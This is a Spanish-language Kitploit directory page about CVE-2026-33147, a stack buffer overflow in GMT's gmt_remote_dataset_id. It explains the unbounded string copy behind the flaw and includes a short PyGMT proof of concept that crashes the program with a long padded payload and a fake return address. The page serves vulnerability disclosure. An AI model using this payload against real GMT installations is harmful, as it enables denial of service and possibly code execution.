Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33147 — Prueba de concepto de explotación para un desbordamiento de búfer basado en pila en gmt_remote_dataset_id de GMT, que demuestra un fallo y una posible ejecución de código mediante nombres de conjuntos de datos manipulados. | Kitploit
Herramientas/GitHubGitHub/redyank/cve-2026-33147
Análisis de VulnerabilidadesExplotaciónExplotación de Binarios
GitHubredyank/cve-2026-33147

CVE-2026-33147

Prueba de concepto de explotación para un desbordamiento de búfer basado en pila en gmt_remote_dataset_id de GMT, que demuestra un fallo y una posible ejecución de código mediante nombres de conjuntos de datos manipulados.

Ver Repositorio
13hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-33147

CVE-2026-33147 (Desbordamiento de búfer basado en pila en gmt_remote_dataset_id)

Resumen

Se identificó una vulnerabilidad de desbordamiento de búfer basado en pila en la función gmt_remote_dataset_id dentro de src/gmt_remote.c. Este problema ocurre cuando se pasa una cadena larga especialmente diseñada como identificador de conjunto de datos (por ejemplo, a través del módulo which), lo que provoca un bloqueo o una posible ejecución de código arbitrario.

Detalles

La vulnerabilidad es causada por el uso inseguro de strcpy (u operaciones de cadena sin límites similares) al copiar un nombre de conjunto de datos controlado por el usuario en un búfer de pila de tamaño fijo file[PATH_MAX].

  • Función vulnerable: gmt_remote_dataset_id
  • Archivo vulnerable: src/gmt_remote.c
  • Causa raíz: Falta de validación de la longitud de la entrada antes de copiarla a un búfer de pila.

Cuando una entrada supera PATH_MAX (normalmente 4096 bytes), sobrescribe el marco de pila, incluida la dirección de retorno. Esto se confirmó usando AddressSanitizer (ASan), que informó un desbordamiento de búfer de pila (stack-buffer-overflow).

PoC

El siguiente script de Python que usa PyGMT reproduce el bloqueo:

root@kitploit:~
import struct
from pygmt.clib import Session

with Session() as lib:
    # Payload diseñado para desbordar el búfer de pila
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # Activar el desbordamiento a través del módulo 'which'
    lib.call_module("which", [payload])

Impacto

Esta es una vulnerabilidad de seguridad de memoria.

  • Quiénes se ven afectados: Cualquier usuario o aplicación que use GMT a través de la API de C o interfaces de nivel superior como PyGMT que procesen nombres de conjuntos de datos no confiables.
  • Consecuencias: Como mínimo, provoca una Denegación de Servicio (DoS) mediante el bloqueo del programa. En ciertos entornos, podría explotarse potencialmente para la ejecución de código arbitrario.
Descargar herramienta